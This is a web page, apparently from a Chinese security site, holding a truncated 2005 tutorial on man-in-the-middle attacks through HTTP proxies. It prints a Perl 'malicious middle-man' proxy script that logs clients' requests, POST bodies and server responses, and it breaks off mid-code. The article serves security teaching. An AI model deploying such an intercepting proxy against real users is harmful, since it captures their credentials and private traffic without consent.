📄 man-in-the-middle-attacks in proxy.html
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Man-in-the-middle-attacks In Proxy </title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography,安全焦点, xfocus,MITM攻击,proxy,http" /><link rel="stylesheet" href="../../css/plone.css" type="text/css"></head><body bgcolor="#FFFFFF" text="#000000"><div class="top"> <div class="searchBox"> <form name="searchform" action="http://www.google.com/search" method="get"> <input type="hidden" name="domains" value="www.xfocus.net"> <input type="hidden" name="sitesearch" value="www.xfocus.net"> <input type="text" name="q" size="20"> <input type="submit" name="btnG" value="Google Search"> </form> </div> <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo"> <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title"></div><div class="tabs"> <a href="../../index.html" class="plain">首页</a> <a href="../../releases/index.html" class="plain">焦点原创</a> <a href="../../articles/index.html" class="selected">安全文摘</a> <a href="../../tools/index.html" class="plain">安全工具</a> <a href="../../vuls/index.html" class="plain">安全漏洞</a> <a href="../../projects/index.html" class="plain">焦点项目</a> <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a> <a href="../../about/index.html" class="plain">关于我们</a></div><div class="personalBar"> <a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a></div><table class="columns">
<tr>
<td class="left">
<div class="box">
<h5> 文章分类 </h5>
<div class="body">
<div class="content odd">
<div style="white-space: nowrap;">
<img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'>漏洞分析</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'><b>黑客教学 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
</div>
</div>
</div>
</div>
<div class="box">
<h5> 文章推荐 </h5>
<div class="body">
<div class="content odd">
<img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
</div>
</div>
</div>
</td>
<td class="main">
<h1>Man-in-the-middle-attacks In Proxy</h1><br>创建时间:2005-05-08<br>文章属性:原创<br>文章提交:<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=86728'>HeiGe</a> (hack-520_at_163.com)<br><br>Man-in-the-middle-attacks In Proxy<br />
文/安全天使·Superhei 2005.5.1<br />
前言:<br />
说起“中间人攻击(Man-in-the-middle-attacks,简称:MITM攻击)”大家可能马上想起曾经风靡一时的SMB会话劫持,DNS欺骗等技术,这些都是典型的MITM攻击手段。其实MITM攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中,A通过B给C传话,那么B在传话给C的时候,可以夸大其词,也可以填油加醋后传给C,在这个过程中中间人B 无意中就来一次MITM攻击,其实“谣言”就是这么来的 J. 具体在网络安全方面 ,MITM攻击应用也很广泛,下面我就以http协议代理来介绍下代理里MITM攻击。<br />
<br />
一 .原理<br />
代理服务的一个典型模型:<br />
<br />
client <<-data-> proxy server <&szlig;data-> Web Server<br />
middle man<br />
上面可以看出:client 发出的请求 和 web server返回的数据都经过proxy server 转发,这个proxy server 就起到了一个middle man的作用,如果这个“中间人” 够黑,那么整个代理过程的数据 都可以由这个“中间人”控制。<br />
<br />
二.攻击类型<br />
<br />
截取敏感数据<br />
代码注射<br />
Proxp worm<br />
其他利用<br />
<br />
三.实例说明<br />
1. 截取敏感数据<br />
首先我们编写一个“恶意的中间人” 代理程序:<br />
<br />
=============================codz start===============================<br />
#!/usr/bin/perl <br />
#proxy mid-man-atk Test script<br />
<br />
use strict;<br />
use URI;<br />
use IO::Socket;<br />
<br />
my $showOpenedSockets=1;<br />
<br />
my $server = IO::Socket::INET->new (<br />
LocalPort => 8080,<br />
Type => SOCK_STREAM,<br />
Reuse => 1,<br />
Listen => 10);<br />
<br />
<br />
binmode $server;<br />
<br />
while (my $browser = $server->accept()) {<br />
print "\n\n--------------Clint提交数据-------------------\n";<br />
<br />
binmode $browser;<br />
<br />
my $method ="";<br />
my $content_length = 0;<br />
my $content = 0;<br />
my $accu_content_length = 0;<br />
my $host;<br />
my $hostAddr;<br />
my $httpVer;<br />
<br />
while (my $browser_line = <$browser>) {<br />
unless ($method) {<br />
($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+) +(\S+) +(\S+)/;<br />
<br />
my $uri = URI->new($hostAddr);<br />
<br />
$host = IO::Socket::INET->new (<br />
PeerAddr=> $uri->host,<br />
PeerPort=> $uri->port );<br />
<br />
die "couldn't open $hostAddr" unless $host;<br />
<br />
if ($showOpenedSockets) {<br />
print "Opened ".$uri->host." , port ".$uri->port."\n";<br />
}<br />
<br />
binmode $host;<br />
<br />
print $host "$method ".$uri->path_query." $httpVer\n";<br />
print "$method ".$uri->path_query." $httpVer\n";<br />
next;<br />
}<br />
<br />
$content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;<br />
$accu_content_length+=length $browser_line;<br />
print $browser_line;<br />
print $host $browser_line;<br />
last if $browser_line =~ /^\s*$/ and $method ne 'POST';<br />
if ($browser_line =~ /^\s*$/ and $method eq "POST") {<br />
$content = 1;<br />
last unless $content_length;<br />
next;<br />
}<br />
if ($content) {<br />
$accu_content_length+=length $browser_line;<br />
last if $accu_content_length >= $content_length;<br />
}<br />
}<br />
print "\n\n................Serve返回数据.................xx\n";<br />
<br />
$content_length = 0;<br />
$content = 0;<br />
$accu_content_length = 0;<br />
<br />
my @ret= <$host>;<br />
<br />
foreach my $host_line (@ret){<br />
print $host_line;<br />
print $browser $host_line;<br />
$content_length = $1 if $host_line=~/Content-length: +(\d+)/i;<br />
if ($host_line =~ m/^\s*$/ and not $content) {<br />
$content = 1;<br />
#last unless $content_length;<br />
next;<br />
}<br />
if ($content) {<br />
if ($content_length) {<br />
$accu_content_length+=length $host_line;<br />
print "\nContent Length: $content_length, accu: $accu_content_length\n";<br />
last if $accu_content_length >= $content_length;<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -